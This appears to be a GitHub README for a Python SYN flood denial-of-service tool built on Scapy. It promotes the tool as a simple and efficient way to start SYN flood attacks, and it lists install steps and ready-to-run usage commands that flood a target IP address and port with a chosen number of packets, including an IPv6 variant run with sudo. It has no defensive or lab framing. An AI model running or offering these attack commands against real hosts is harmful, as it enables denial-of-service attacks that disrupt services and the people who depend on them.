EmreOvunc / Python-SYN-Flood-Attack-Tool

Python SYN Flood Attack Tool, you can start SYN Flood attack with this tool. Simple and efficient.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Python2/3-SYN-Flood-Attack-Tool

Python SYN Flood Attack Tool

You can start SYN Flood attack with this tool.

Simple and efficient.

Dependencies

apt install python-scapy
apt install python3-scapy

Installation

git clone https://github.com/EmreOvunc/Python-SYN-Flood-Attack-Tool.git
cd Python-SYN-Flood-Attack-Tool

Usage

python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 5
python3 py3_SYN-Flood.py
python SYN-Flood.py
usage: py3_synflood_cmd.py [-h] [--target TARGET] [--port PORT]
                           [--count COUNT] [--version]

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        target IP address
  --port PORT, -p PORT  target port number
  --count COUNT, -c COUNT
                        number of packets
  --version, -v         show program's version number and exit

Usage: python3 py3_synflood_cmd.py -t 10.20.30.40 -p 8080 -c 1

alt tag

alt tag

alt tag

Update(2024/03/20)

Add IPv6 support, you can use command like following

sudo python3 py3_synflood_cmd.py -t 2001:b030:7140:ac00:ed50:b959:3649:be45 -p 52916 -c 100 -f 6

About

Python SYN Flood Attack Tool, you can start SYN Flood attack with this tool. Simple and efficient.


Languages

Language:Python 100.0%